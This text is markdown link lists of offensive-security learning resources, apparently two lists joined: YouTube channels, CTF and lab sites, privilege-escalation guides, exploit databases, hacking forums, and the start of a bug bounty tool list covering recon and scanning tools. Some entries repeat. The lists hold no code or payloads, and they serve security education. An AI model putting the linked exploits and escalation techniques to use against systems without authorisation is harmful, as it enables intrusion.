[Psiinon](https://www.youtube.com/channel/UC-3qyzm4f29C12KGp3-12bQ) | medium length instructional videos, for the OWASP Zed Attack Proxy
[SJSU Infosec](https://www.youtube.com/channel/UCDNzNvZlYK8jZLsUbdiGrsQ/videos) | handful of lengthy instructional videos from San Jose State university Infosec
[Secappdev.org](https://www.youtube.com/channel/UCSii2fuiLLlGqaR6sR_y0rA) | tons of lengthy instructional lectures on Secure App Development
[Security Fest](https://www.youtube.com/channel/UCByLDp7r7gHGoO7yYMYFeWQ) | medium length con-style talks from a security festival in Sweden
[SecurityTubeCons](https://www.youtube.com/channel/UC2wNN-Zqiq4J1PLPnyMBWUg) | an assortment of con-style talks from various cons including BlackHat and Shmoocon
[ToorCon](https://www.youtube.com/channel/UCnzjmL0xkTBYwFZD7agHGWw) | handful of medium length con videos from con based in San Diego, CA
[USENIX Enigma Conference](https://www.youtube.com/channel/UCIdV7bE97mSPTH1mOi_yUrw/feed) | medium length "round table discussion with leading experts", content starts in 2016
[ZeroNights](https://www.youtube.com/channel/UCtQ0fPmP4fCGBkYWMxnjh6A) | a lot of con-style talks from international conference ZeroNights
| <td colspan = "2"> **News** </td>
[0x41414141](https://www.youtube.com/channel/UCPqes566OZ3G_fjxL6BngRQ) | Channel with couple challenges, well explained
[Adrian Crenshaw](https://www.youtube.com/user/irongeek) | lots of lengthy con-style talks
[Corey Nachreiner](https://www.youtube.com/channel/UC7dUL0FbVPGqzdb2HtWw3Xg) | security newsbites, 2.7K subscribers, 2-3 videos a week, no set schedule
[BalCCon - Balkan Computer Congress](https://www.youtube.com/channel/UCoHypmu8rxlB5Axh5JxFZsA) | Long con-style talks from the Balkan Computer Congress, doesn't update regularly
[danooct1](https://www.youtube.com/channel/UCqbkm47qBxDj-P3lI9voIAw) | lots of brief screenshot, how-to vids regarding malware, regular content updates, 186K followerss
[DedSec](https://www.youtube.com/channel/UCx34ZZW2KgezfUPPeL6m8Dw) | lots of brief screenshot how-to vids based in Kali, no recent posts.
[DEFCON Conference](https://www.youtube.com/channel/UC6Om9kAkl32dWlDSNlDS9Iw) | lots of lengthy con-style vids from the iconical DEFCON
[DemmSec](https://www.youtube.com/channel/UCJItQmwUrcW4VdUqWaRUNIg) | lots of pen testing vids, somewhat irregular uploads, 44K followers
[Derek Rook - CTF/Boot2root/wargames Walkthrough](https://www.youtube.com/channel/UCMACXuWd2w6_IEGog744UaA) | lots of lengthy screenshot instructional vids, with
[Don Does 30](https://www.youtube.com/channel/UCarxjDjSYsIf50Jm73V1D7g) | amateur pen-tester posting lots of brief screenshot vids regularly, 9K Followers
[Error 404 Cyber News](https://www.youtube.com/channel/UC4HcNHFKshqj-aeyi6imW7Q) | short screen-shot videos with loud metal, no dialog, bi-weekly
[Geeks Fort - KIF](https://www.youtube.com/channel/UC09NdTL2hkThGLSab8chJMw) | lots of brief screenshot vids, no recent posts
[GynvaelEN](https://www.youtube.com/channel/UCCkVMojdBWS-JtH7TliWkVg) | Security streams from Google Researcher. Mainly about CTFs, computer security, programing and similar things.
[HackerSploit](https://www.youtube.com/channel/UC0ZTPkdxlAKf-V33tqXwi3Q) | regular posts, medium length screenshot vids, with dialog
[HACKING TUTORIALS](https://www.youtube.com/channel/UCbsn2kQwNxcIzHwbdDjzehA) | handful of brief screenshot vids, no recent posts.
[iExplo1t](https://www.youtube.com/channel/UCx0HClQ_cv0sLNOVhoO2nxg/videos) | lots of screenshot vids aimed at novices, 5.7K Followers, no recent posts
[JackkTutorials](https://www.youtube.com/channel/UC64x_rKHxY113KMWmprLBPA) | lots of medium length instructional vids with some AskMe vids from the youtuber
[John Hammond](https://www.youtube.com/user/RootOfTheNull) | Solves CTF problems. contains penTesting tips and tricks
[Latest Hacking News](https://www.youtube.com/user/thefieldhouse/feed) | 10K followers, medium length screenshot videos, no recent releases
[LionSec](https://www.youtube.com/channel/UCCQLBOt_hbGE-b9I696VRow) | lots of brief screenshot instructional vids, no dialog
[LiveOverflow](https://www.youtube.com/channel/UClcE-kVhqyiHCcjYwcpfj9w) | Lots of brief-to-medium instructional vids, covering things like buffer overflows and exploit writing, regular posts.
[Metasploitation](https://www.youtube.com/channel/UC9Qa_gXarSmObPX3ooIQZrg) | lots of screenshot vids, little to no dialogue, all about using Metasploit, no recent vids.
[NetSecNow](https://www.youtube.com/channel/UC6J_GnSAi7F2hY4RmnMcWJw) | channel of pentesteruniversity.org, seems to post once a month, screenshot instructional vids
[Open SecurityTraining](https://www.youtube.com/channel/UCthV50MozQIfawL9a_g5rdg) | lots of lengthy lecture-style vids, no recent posts, but quality info.
[Pentester Academy TV](https://www.youtube.com/channel/UChjC1q6Ami7W0E71TzPZELA) | lots of brief videos, very regular posting, up to +8 a week
[Penetration Testing in Linux](https://www.youtube.com/channel/UC286ntgASMskhPIJQebJVvA) | DELETE
[rwbnetsec](https://www.youtube.com/channel/UCAJ8Clc3188ek9T_5XTVzZQ) | lots of medium length instructional videos covering tools from Kali 2.0, no recent posts.
[Samy Kamkar's Applied Hacking](https://www.youtube.com/user/s4myk) | brief to medium length instructional vids from the creator of PoisonTap for the Raspberry Pi Zero, no recent content, last updated in 2016
[SecureNinjaTV](https://www.youtube.com/channel/UCNxfV4yR0nIlhFmfwcdf3BQ) | brief news bites, irregular posting, 18K followers
[Security Weekly](https://www.youtube.com/channel/UCg--XBjJ50a9tUhTKXVPiqg) | regular updates, lengthy podcast-style interviews with industry pros
[Seytonic](https://www.youtube.com/channel/UCW6xlqxSY3gGur4PkGPEUeA) | variety of DIY hacking tutorials, hardware hacks, regular updates
[Shozab Haxor](https://www.youtube.com/channel/UCBwub2kRoercWQJ2mw82h3A) | lots of screenshot style instructional vids, regular updates, windows CLI tutorial
[SSTec Tutorials](https://www.youtube.com/channel/UCHvUTfxL_9bNQgqzekPWHtg) | lots of brief screenshot vids, regular updates
[Tradecraft Security Weekly](https://wiki.securityweekly.com/Tradecraft_Security_Weekly) | Want to learn about all of the latest security tools and techniques?
[Troy Hunt](https://www.youtube.com/channel/UCD6MWz4A61JaeGrvyoYl-rQ) | lone youtuber, medium length news videos, 16K followers, regular content
[Waleed Jutt](https://www.youtube.com/channel/UCeN7cOELsyMHrzfMsJUgv3Q) | lots of brief screenshot vids covering web security and game programming
[webpwnized](https://www.youtube.com/channel/UCPeJcqbi8v46Adk59plaaXg) | lots of brief screenshot vids, some CTF walkthroughs
[Zer0Mem0ry](https://www.youtube.com/channel/UCDk155eaoariJF2Dn2j5WKA) | lots of brief c++ security videos, programming intensive
[LionSec](https://www.youtube.com/channel/UCCQLBOt_hbGE-b9I696VRow) | lots of brief screenshot instructional vids, no dialog
[Adrian Crenshaw](https://www.youtube.com/user/irongeek) | lots of lengthy con-style talks
[HackerSploit](https://www.youtube.com/channel/UC0ZTPkdxlAKf-V33tqXwi3Q) | regular posts, medium length screenshot vids, with dialog
[Derek Rook - CTF/Boot2root/wargames Walkthrough](https://www.youtube.com/channel/UCMACXuWd2w6_IEGog744UaA) | lots of lengthy screenshot instructional vids, with
[Tradecraft Security Weekly](https://wiki.securityweekly.com/Tradecraft_Security_Weekly) | Want to learn about all of the latest security tools and techniques?
[IPPSec](https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA) | Hackthebox.eu retired machine vulnerable machine walkthroughs to help you learn both basic and advanced processes and techniques
[The Daily Swig](https://portswigger.net/daily-swig) | Latest Cybersecurity News
### Sharpening Your Skills
Name | Description
---- | ----
[Backdoor](https://backdoor.sdslabs.co) | pen testing labs that have a space for beginners, a practice arena and various competitions, account required
[The cryptopals crypto challenges](http://cryptopals.com/) | A bunch of CTF challenges, all focused on cryptography.
[Challenge Land](http://challengeland.co/) | Ctf site with a twist, no simple sign-up, you have to solve a challengeto even get that far!
[Crackmes.de Archive (2011-2015)](https://tuts4you.com/download.php?view.3152) | a reverse engineering information Repo, started in 2003
[Crackmes.one](https://crackmes.one/) | This is a simple place where you can download crackmes to improve your reverse engineering skills.
[CTFLearn](https://ctflearn.com/) | an account-based ctf site, where users can go in and solve a range of challenges
[CTFs write-ups](https://github.com/ctfs) | a collection of writeups from various CTFs, organized by
[CTF365](https://ctf365.com/) | account based ctf site, awarded by Kaspersky, MIT, T-Mobile
[The enigma group](https://www.enigmagroup.org/) | web application security training, account based, video tutorials
[Exploit exercises](https://exploit-exercises.com/) | hosts 5 fulnerable virtual machines for you to attack, no account required
[Google CTF](https://github.com/google/google-ctf) | Source code of Google 2017, 2018 and 2019 CTF
[Google CTF 2019](https://capturetheflag.withgoogle.com/) | 2019 edition of the Google CTF contest
[Google's XSS game](https://xss-game.appspot.com/) | XSS challenges, and potentially a chance to get paid!
[Hack The Box](https://www.hackthebox.gr/en/login) | Pen testing labs hosting over 39 vulnerable machines with two additional added every month
[Hacker test](http://www.hackertest.net/) | similar to "hackthissite", no account required.
[Hacker Gateway](https://www.hackergateway.com/) | ctfs covering steganography, cryptography, and web challengs, account required
[Hacksplaining](https://www.hacksplaining.com/) | a clickthrough security informational site, very good for beginners.
[hackburger.ee](http://hackburger.ee/) | hosts a number of web hacking challenges, account required
[Hack.me](https://hack.me/) | lets you build/host/attack vulnerable web apps
[Hack this site!](https://www.hackthissite.org/) | an oldy but goodie, account required, users start at low levels and progress in difficulty
[knock.xss.moe](https://knock.xss.moe) | XSS challenges, account required.
[Lin.security](https://in.security/lin-security-practise-your-linux-privilege-escalation-foo/) | Practice your Linux privilege escalation
[noe.systems](http://noe.systems/) | Korean challenge site, requires an account
[Over the wire](http://overthewire.org/wargames/) | A CTF that's based on progressive levels for each lab, the users SSH in, no account recquired
[Participating Challenge Sites](http://www.wechall.net/active_sites/all/by/site_avg/DESC/page-1) | aims at creating a universal ranking for CTF participants
[PentesterLab](https://pentesterlab.com/) | hosts a variety of exercises as well as various "bootcamps" focused on specific activities
[Pentestit](https://lab.pentestit.ru/) | acocunt based CTF site, users have to install open VPN and get credentials
[Pentest Practice](https://www.pentestpractice.com/) | account based Pentest practice, free to sign up, but there's also a pay-as-you-go feature
[Pentest.training](https://pentest.training) | lots of various labs/VMS for you to try and hack, registry is optional.
[PicoCTF](https://2017game.picoctf.com/) | CTF hosted by Carnegie Mellon, occurs yearly, account required.
[pwnable.kr](http://pwnable.kr/) | Don't let the cartoon characters fool you, this is a serious CTF site that will teach you a lot, account required
[pwnable.tw](http://pwnable.tw/) | hosts 27 challenges accompanied with writeups, account required
[Ringzer0 Team](https://ringzer0team.com/challenges) | an account based CTF site, hosting over 272 challenges
[ROP Emporium](https://ropemporium.com/) | Return Oriented Programming challenges
[SmashTheStack](http://smashthestack.org/wargames.html) | hosts various challenges, similar to OverTheWire, users must SSH into the machines and progress in levels
[Shellter Labs](https://shellterlabs.com/en/) | account based infosec labs, they aim at making these activities social
[Solve Me](http://solveme.safflower.kr/) | "yet another challenge", account required.
[Vulnhub](https://www.vulnhub.com/) | site hosts a ton of different vulnerable Virtual Machine images, download and get hacking
[websec.fr](https://websec.fr/) | Focused on web challenges, registration is optional.
[tryhackme](https://tryhackme.com) | Awesome platform to start learning cybersecurity, account is needed
[webhacking.kr](https://webhacking.kr) | lots of web security challenges are available, recommended for beginners. You need to solve a simple challenge to sign up.
[Stereotyped Challenges](https://chall.stypr.com/) | Challenges for web security professionals, account required.
[Stripe CTF 2.0](https://github.com/stripe-ctf) | Past security contest where you can discover and exploit vulnerabilities in mock web applications.
[Windows / Linux Local Privilege Escalation Workshop](https://github.com/sagishahar/lpeworkshop) | Practice your Linux and Windows privilege escalation
[Hacking Articles](http://www.hackingarticles.in/ctf-challenges1/) | CTF Brief Write up collection with a lot of screenshots good for begginers
[Hacker101 CTF](https://ctf.hacker101.com/) | CTF hosted by HackerOne, always online. You will receive invitations to some private programs on HackerOne platform as a reward.
[Hacking Lab](https://www.hacking-lab.com/index.html) | European platform hosting lots of riddles, challenges and competitions
[Portswigger](https://portswigger.net/) | Best Platform inorder to learn Web Pentesting, account required
### Reverse Engineering, Buffer Overflow and Exploit Development
Name | Description
---- | ----
[A Course on Intermediate Level Linux Exploitation](https://github.com/nnamon/linux-exploitation-course) | as the title says, this course isn't for beginners
[Analysis and exploitation (unprivileged)](https://www.it-sec-catalog.info/analysis_and_exploitation_unprivileged.html) | huge collection of RE information, organized by type.
[Binary hacking](http://liveoverflow.com/binary_hacking/index.html) | 35 "no bullshit" binary videos along with other info
[Buffer Overflow Exploitation Megaprimer for Linux](http://www.securitytube.net/groups?operation=view&groupId=4) | Collection of Linux Rev. Engineering videos
[Corelan tutorials](https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/) | detailed tutorial, lots of good information about memory
[Exploit tutorials](http://www.primalsecurity.net/tutorials/exploit-tutorials/) | a series of 9 exploit tutorials,also features a podcast
[Exploit development](https://0x00sec.org/c/exploit-development) | links to the forum's exploit dev posts, quality and post style will vary with each poster
[flAWS challenge](http://flaws.cloud/) | Through a series of levels you'll learn about common mistakes and gotchas when using Amazon Web Services (AWS).
[Introduction to ARM Assembly Basics](https://azeria-labs.com/writing-arm-assembly-part-1/) | tons of tutorials from infosec pro Azeria, follow her on twitter
[Introductory Intel x86](http://www.opensecuritytraining.info/IntroX86.html) | 63 days of OS class materials, 29 classes, 24 instructors, no account required
[Lena's Reversing for Newbies (Complete)](https://tuts4you.com/download.php?view.2876) | listing of a lengthy resource by Lena, aimed at being a course
[Linux (x86) Exploit Development Series](https://sploitfun.wordpress.com/2015/06/26/linux-x86-exploit-development-tutorial-series/) | blog post by sploitfun, has 3 different levels
[Megabeets journey into Radare2](https://www.megabeets.net/a-journey-into-radare-2-part-1/) | one user's radare2 tutorials
[Modern Binary Exploitation - CSCI 4968](https://github.com/RPISEC/MBE) | RE challenges, you can download the files or download the VM created by RPISEC specifically for challenges, also links to their home page with tons of infosec lectures
[Recon.cx - reversing conference](https://recon.cx/) | the conference site contains recordings and slides of all talks!!
[Reverse Engineering for Beginners](https://beginners.re/RE4B-EN.pdf) | huge textbook, created by Dennis Yurichev, open-source
[Reverse engineering reading list](https://github.com/onethawt/reverseengineering-reading-list/blob/master/README.md) | a github collection of RE tools and books
[Reverse Engineering challenges](https://challenges.re/) | collection of challenges from the writer of RE for Beginners
[Reverse Engineering for beginners (GitHub project)](https://github.com/dennis714/RE-for-beginners) | github for the above
[Reverse Engineering Malware 101](https://malwareunicorn.org/workshops/re101.html) | intro course created by Malware Unicorn, complete with material and two VM's
[Reverse Engineering Malware 102](https://malwareunicorn.org/workshops/re102.html) | the sequel to RE101
[reversing.kr challenges](http://www.reversing.kr/challenge.php) | reverse engineering challenges varying in difficulty
[Shell storm](http://shell-storm.org/) | Blog style collection with organized info about Rev. Engineering.
[Shellcode Injection](https://dhavalkapil.com/blogs/Shellcode-Injection/) | a blog entry from a grad student at SDS Labs
[Micro Corruption — Assembly](https://microcorruption.com) | CTF designed to learn Assembly by practicing
### Privilege Escalation
Name | Description
---- | ----
[4 Ways get linux privilege escalation](http://www.hackingarticles.in/4-ways-get-linux-privilege-escalation/) | shows different examples of PE
[A GUIDE TO LINUX PRIVILEGE ESCALATION](https://payatu.com/guide-linux-privilege-escalation/) | Basics of Linux privilege escalation
[Abusing SUDO (Linux Privilege Escalation)](http://touhidshaikh.com/blog/?p=790) | Abusing SUDO (Linux Privilege Escalation)
[AutoLocalPrivilegeEscalation](https://github.com/ngalongc/AutoLocalPrivilegeEscalation) | automated scripts that downloads and compiles from exploitdb
[Basic linux privilege escalation](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/) | basic linux exploitation, also covers Windows
[Common Windows Privilege Escalation Vectors](https://www.toshellandback.com/2015/11/24/ms-priv-esc/) | Common Windows Privilege Escalation Vectors
[Editing /etc/passwd File for Privilege Escalation](http://www.hackingarticles.in/editing-etc-passwd-file-for-privilege-escalation/) | Editing /etc/passwd File for Privilege Escalation
[Linux Privilege Escalation ](https://securityweekly.com/2017/12/17/linux-privilege-escalation-tradecraft-security-weekly-22/) | Linux Privilege Escalation – Tradecraft Security Weekly (Video)
[Linux Privilege Escalation Check Script](https://github.com/sleventyeleven/linuxprivchecker) | a simple linux PE check script
[Linux Privilege Escalation Scripts](http://netsec.ws/?p=309#more-309) | a list of PE checking scripts, some may have already been covered
[Linux Privilege Escalation Using PATH Variable](http://www.hackingarticles.in/linux-privilege-escalation-using-path-variable/) | Linux Privilege Escalation Using PATH Variable
[Linux Privilege Escalation using Misconfigured NFS](http://www.hackingarticles.in/linux-privilege-escalation-using-misconfigured-nfs/) | Linux Privilege Escalation using Misconfigured NFS
[Linux Privilege Escalation via Dynamically Linked Shared Object Library](https://www.contextis.com/blog/linux-privilege-escalation-via-dynamically-linked-shared-object-library) | How RPATH and Weak File Permissions can lead to a system compromise.
[Local Linux Enumeration & Privilege Escalation Cheatsheet](https://www.rebootuser.com/?p=1623) | good resources that could be compiled into a script
[OSCP - Windows Priviledge Escalation](http://hackingandsecurity.blogspot.com/2017/09/oscp-windows-priviledge-escalation.html) | Common Windows Priviledge Escalation
[Privilege escalation for Windows and Linux](https://github.com/AusJock/Privilege-Escalation) | covers a couple different exploits for Windows and Linux
[Privilege escalation linux with live example](http://resources.infosecinstitute.com/privilege-escalation-linux-live-examples/) | covers a couple common PE methods in linux
[Reach the root](https://hackmag.com/security/reach-the-root/) | discusses a process for linux privilege exploitation
[RootHelper](https://github.com/NullArray/RootHelper) | a tool that runs various enumeration scripts to check for privilege escalation
[Unix privesc checker](http://pentestmonkey.net/tools/audit/unix-privesc-check) | a script that checks for PE vulnerabilities on a system
[Windows exploits, mostly precompiled.](https://github.com/abatchy17/WindowsExploits) | precompiled windows exploits, could be useful for reverse engineering too
[Windows Privilege Escalation](http://www.bhafsec.com/wiki/index.php/Windows_Privilege_Escalation) | collection of wiki pages covering Windows Privilege escalation
[Windows Privilege Escalation](https://memorycorruption.org/windows/2018/07/29/Notes-On-Windows-Privilege-Escalation.html) | Notes on Windows Privilege Escalation
[Windows privilege escalation checker](https://github.com/netbiosX/Checklists/blob/master/Windows-Privilege-Escalation.md) | a list of topics that link to pentestlab.blog, all related to windows privilege escalation
[Windows Privilege Escalation Fundamentals](http://www.fuzzysecurity.com/tutorials/16.html) | collection of great info/tutorials, option to contribute to the creator through patreon, creator is an OSCP
[Windows Privilege Escalation Guide](https://www.sploitspren.com/2018-01-26-Windows-Privilege-Escalation-Guide/) | Windows Privilege Escalation Guide
[Windows Privilege Escalation Methods for Pentesters](https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/) | Windows Privilege Escalation Methods for Pentesters
### Malware Analysis
Name | Description
---- | ----
[Malware traffic analysis](http://www.malware-traffic-analysis.net/) | list of traffic analysis exercises
[Malware Analysis - CSCI 4976](https://github.com/RPISEC/Malware/blob/master/README.md) | another class from the folks at RPISEC, quality content
[Bad Binaries] (https://www.badbinaries.com/) | walkthrough documents of malware traffic analysis exercises and some occasional malware analysis.
### Network Scanning / Reconnaissance
Name | Description
---- | ----
[Foot Printing with WhoIS/DNS records](https://www.sans.org/reading-room/whitepapers/hackers/fundamentals-computer-hacking-956) | a white paper from SANS
[Google Dorks/Google Hacking](https://d4msec.wordpress.com/2015/09/03/google-dorks-for-finding-emails-admin-users-etc/) | list of commands for google hacks, unleash the power of the world's biggest search engine
### Vulnerable Web Application
Name | Description
---- | ----
[bWAPP](http://www.itsecgames.com/) | common buggy web app for hacking, great for beginners, lots of documentation
[Damn Small Vulnerable Web](https://github.com/stamparm/DSVW) | written in less than 100 lines of code, this web app has tons of vulns, great for teaching
[Damn Vulnerable Web Application (DVWA)](http://www.dvwa.co.uk/) | PHP/MySQL web app for testing skills and tools
[Google Gruyere](https://google-gruyere.appspot.com/) | host of challenges on this cheesy web app
[OWASP Broken Web Applications Project](https://github.com/chuckfw/owaspbwa/) | hosts a collection of broken web apps
[OWASP Hackademic Challenges project](https://github.com/Hackademic/hackademic/) | web hacking challenges
[OWASP Mutillidae II](https://sourceforge.net/projects/mutillidae/files/) | another OWASP vulnerable app, lots of documentation.
[OWASP Juice Shop](https://github.com/bkimminich/juice-shop) | covers the OWASP top 10 vulns
[WebGoat: A deliberately insecure Web Application](https://github.com/WebGoat/WebGoat) | maintained by OWASP and designed to to teach web app security
### Vulnerable OS
Name | Description
---- | ----
[General Test Environment Guidance](https://community.rapid7.com/docs/DOC-2196) | white paper from the pros at rapid7
[Metasploitable2 (Linux)](https://sourceforge.net/projects/metasploitable/files/Metasploitable2/) | vulnerable OS, great for practicing hacking
[Metasploitable3](https://github.com/rapid7/metasploitable3) \[[Installation](https://github.com/rapid7/metasploitable3/blob/master/README.md)\] | the third installation of this vulnerable OS
[Vulnhub](https://www.vulnhub.com/) | collection of tons of different vulnerable OS and challenges
### Linux Penetration Testing OS
Name | Description
---- | -----
[Android Tamer](https://androidtamer.com//) | Android Tamer is a Virtual / Live Platform for Android Security professionals.
[BackBox](https://backbox.org/index) | open source community project, promoting security in IT enivornments
[BlackArch](https://blackarch.org/index.html) | Arch Linux based pentesting distro, compatible with Arch installs
[Bugtraq](http://bugtraq-team.com/) | advanced GNU Linux pen-testing technology
[Docker for pentest](https://github.com/aaaguirrep/pentest) | Image with the more used tools to create a pentest environment easily and quickly.
[Kali](http://kali.org/) | the infamous pentesting distro from the folks at Offensive Security
[LionSec Linux](https://lionsec-linux.org/) | pentesting OS based on Ubuntu
[Parrot ](https://www.parrotsec.org/) | Debian includes full portable lab for security, DFIR, and development
[Pentoo](https://www.pentoo.ch/) | pentesting OS based on Gentoo
### Exploits
Name | Description
---- | ----
[0day.today](http://0day.today/) | Easy to navigate database of exploits
[Exploit Database](https://www.exploit-db.com/) | database of a wide variety exploits, CVE compliant archive
[CXsecurity](https://cxsecurity.com/exploit/) | Indie cybersecurity info managed by 1 person
[Snyk Vulnerability DB](https://snyk.io/vuln/) | detailed info and remediation guidance for known vulns, also allows you to test your code
### Forums
Name | Description
---- | ----
[0x00sec](https://0x00sec.org/) | hacker, malware, computer engineering, Reverse engineering
[Antichat](https://forum.antichat.ru/) | russian based forum
[CODEBY.NET](https://codeby.net/) | hacker, WAPT, malware, computer engineering, Reverse engineering, forensics - russian based forum
[EAST Exploit database](http://eastexploits.com/) | exploit DB for commercial exploits written for EAST Pentest Framework
[Greysec](https://greysec.net) | hacking and security forum
[Hackforums](https://hackforums.net/) | posting webstite for hacks/exploits/various discussion
[4Hat Day](http://4hatday.com) | brazilian based hacker forum
[CaveiraTech](https://caveiratech.com/forum) | brazilian based, general hacker forum
### Archived Security Conference Videos
Name | Description
---- | ----
[InfoCon.org](https://infocon.org/cons/) | hosts data from hundreds of cons
[Irongeek](http://www.irongeek.com/) | Website of Adrien Crenshaw, hosts a ton of info.
[infocondb.org](https://infocondb.org/) | a site that aims to catalog and cross-reference all hacker conferences.
### Online Communities
Name | Description
---- | -----
[Hacktoday](https://www.hacktoday.net/) | requires an account, covering all kinds of hacking topics
[Hack+](http://t.me/hacking_group_channel) | link requires telegram to be used
[MPGH](http://mpgh.net) | community of MultiPlayerGameHacking
### Online News Sources
Name | Description
---- | ----
[InfoSec](http://www.infosecurity-magazine.com/) | covers all the latest infosec topics
[Recent Hash Leaks](https://hashes.org/public.php) | great place to lookup hashes
[Security Intell](https://securityintelligence.com/news/) | covers all kinds of news, great intelligence resources
[Threatpost](https://threatpost.com/) | covers all the latest threats and breaches
[Secjuice](secjuice.com)
[The Hacker News](https://thehackernews.com/) | features a daily stream of hack news, also has an app
|
# Awesome Bug Bounty Tools [![Awesome](https://awesome.re/badge.svg)](https://awesome.re)
> A curated list of various bug bounty tools
## Contents
- [Recon](#Recon)
- [Subdomain Enumeration](#Subdomain-Enumeration)
- [Port Scanning](#Port-Scanning)
- [Screenshots](#Screenshots)
- [Technologies](#Technologies)
- [Content Discovery](#Content-Discovery)
- [Links](#Links)
- [Parameters](#Parameters)
- [Fuzzing](#Fuzzing)
- [Exploitation](#Exploitation)
- [Command Injection](#Command-Injection)
- [CORS Misconfiguration](#CORS-Misconfiguration)
- [CRLF Injection](#CRLF-Injection)
- [CSRF Injection](#CSRF-Injection)
- [Directory Traversal](#Directory-Traversal)
- [File Inclusion](#File-Inclusion)
- [GraphQL Injection](#GraphQL-Injection)
- [Header Injection](#Header-Injection)
- [Insecure Deserialization](#Insecure-Deserialization)
- [Insecure Direct Object References](#Insecure-Direct-Object-References)
- [Open Redirect](#Open-Redirect)
- [Race Condition](#Race-Condition)
- [Request Smuggling](#Request-Smuggling)
- [Server Side Request Forgery](#Server-Side-Request-Forgery)
- [SQL Injection](#SQL-Injection)
- [XSS Injection](#XSS-Injection)
- [XXE Injection](#XXE-Injection)
- [Miscellaneous](#Miscellaneous)
- [Passwords](#Passwords)
- [Secrets](#Secrets)
- [Git](#Git)
- [Buckets](#Buckets)
- [CMS](#CMS)
- [JSON Web Token](#JSON-Web-Token)
- [postMessage](#postMessage)
- [Subdomain Takeover](#Subdomain-Takeover)
- [Uncategorized](#Uncategorized)
---
## Recon
### Subdomain Enumeration
- [Sublist3r](https://github.com/aboul3la/Sublist3r) - Fast subdomains enumeration tool for penetration testers
- [Amass](https://github.com/OWASP/Amass) - In-depth Attack Surface Mapping and Asset Discovery
- [massdns](https://github.com/blechschmidt/massdns) - A high-performance DNS stub resolver for bulk lookups and reconnaissance (subdomain enumeration)
- [Findomain](https://github.com/Findomain/Findomain) - The fastest and cross-platform subdomain enumerator, do not waste your time.
- [Sudomy](https://github.com/Screetsec/Sudomy) - Sudomy is a subdomain enumeration tool to collect subdomains and analyzing domains performing automated reconnaissance (recon) for bug hunting / pentesting
- [chaos-client](https://github.com/projectdiscovery/chaos-client) - Go client to communicate with Chaos DNS API.
- [domained](https://github.com/TypeError/domained) - Multi Tool Subdomain Enumeration
- [bugcrowd-levelup-subdomain-enumeration](https://github.com/appsecco/bugcrowd-levelup-subdomain-enumeration) - This repository contains all the material from the talk "Esoteric sub-domain enumeration techniques" given at Bugcrowd LevelUp 2017 virtual conference
- [shuffledns](https://github.com/projectdiscovery/shuffledns) - shuffleDNS is a wrapper around massdns written in go that allows you to enumerate valid subdomains using active bruteforce as well as resolve subdomains with wildcard handling and easy input-output…
- [censys-subdomain-finder](https://github.com/christophetd/censys-subdomain-finder) - Perform subdomain enumeration using the certificate transparency logs from Censys.
- [Turbolist3r](https://github.com/fleetcaptain/Turbolist3r) - Subdomain enumeration tool with analysis features for discovered domains
- [censys-enumeration](https://github.com/0xbharath/censys-enumeration) - A script to extract subdomains/emails for a given domain using SSL/TLS certificate dataset on Censys
- [tugarecon](https://github.com/LordNeoStark/tugarecon) - Fast subdomains enumeration tool for penetration testers.
- [as3nt](https://github.com/cinerieus/as3nt) - Another Subdomain ENumeration Tool
- [Subra](https://github.com/si9int/Subra) - A Web-UI for subdomain enumeration (subfinder)
- [Substr3am](https://github.com/nexxai/Substr3am) - Passive reconnaissance/enumeration of interesting targets by watching for SSL certificates being issued
- [domain](https://github.com/jhaddix/domain/) - enumall.py Setup script for Regon-ng
- [altdns](https://github.com/infosec-au/altdns) - Generates permutations, alterations and mutations of subdomains and then resolves them
- [brutesubs](https://github.com/anshumanbh/brutesubs) - An automation framework for running multiple open sourced subdomain bruteforcing tools (in parallel) using your own wordlists via Docker Compose
- [dns-parallel-prober](https://github.com/lorenzog/dns-parallel-prober) - his is a parallelised domain name prober to find as many subdomains of a given domain as fast as possible.
- [dnscan](https://github.com/rbsec/dnscan) - dnscan is a python wordlist-based DNS subdomain scanner.
- [knock](https://github.com/guelfoweb/knock) - Knockpy is a python tool designed to enumerate subdomains on a target domain through a wordlist.
- [hakrevdns](https://github.com/hakluke/hakrevdns) - Small, fast tool for performing reverse DNS lookups en masse.
- [dnsx](https://github.com/projectdiscovery/dnsx) - Dnsx is a fast and multi-purpose DNS toolkit allow to run multiple DNS queries of your choice with a list of user-supplied resolvers.
- [subfinder](https://github.com/projectdiscovery/subfinder) - Subfinder is a subdomain discovery tool that discovers valid subdomains for websites.
- [assetfinder](https://github.com/tomnomnom/assetfinder) - Find domains and subdomains related to a given domain
- [crtndstry](https://github.com/nahamsec/crtndstry) - Yet another subdomain finder
- [VHostScan](https://github.com/codingo/VHostScan) - A virtual host scanner that performs reverse lookups
- [scilla](https://github.com/edoardottt/scilla) - Information Gathering tool - DNS / Subdomains / Ports / Directories enumeration
- [sub3suite](https://github.com/3nock/sub3suite) - A research-grade suite of tools for subdomain enumeration, intelligence gathering and attack surface mapping.
- [cero](https://github.com/glebarez/cero) - Scrape domain names from SSL certificates of arbitrary hosts
### Port Scanning
- [masscan](https://github.com/robertdavidgraham/masscan) - TCP port scanner, spews SYN packets asynchronously, scanning entire Internet in under 5 minutes.
- [RustScan](https://github.com/RustScan/RustScan) - The Modern Port Scanner
- [naabu](https://github.com/projectdiscovery/naabu) - A fast port scanner written in go with focus on reliability and simplicity.
- [nmap](https://github.com/nmap/nmap) - Nmap - the Network Mapper. Github mirror of official SVN repository.
- [sandmap](https://github.com/trimstray/sandmap) - Nmap on steroids. Simple CLI with the ability to run pure Nmap engine, 31 modules with 459 scan profiles.
- [ScanCannon](https://github.com/johnnyxmas/ScanCannon) - Combines the speed of masscan with the reliability and detailed enumeration of nmap
### Screenshots
- [EyeWitness](https://github.com/FortyNorthSecurity/EyeWitness) - EyeWitness is designed to take screenshots of websites, provide some server header info, and identify default credentials if possible.
- [aquatone](https://github.com/michenriksen/aquatone) - Aquatone is a tool for visual inspection of websites across a large amount of hosts and is convenient for quickly gaining an overview of HTTP-based attack surface.
- [screenshoteer](https://github.com/vladocar/screenshoteer) - Make website screenshots and mobile emulations from the command line.
- [gowitness](https://github.com/sensepost/gowitness) - gowitness - a golang, web screenshot utility using Chrome Headless
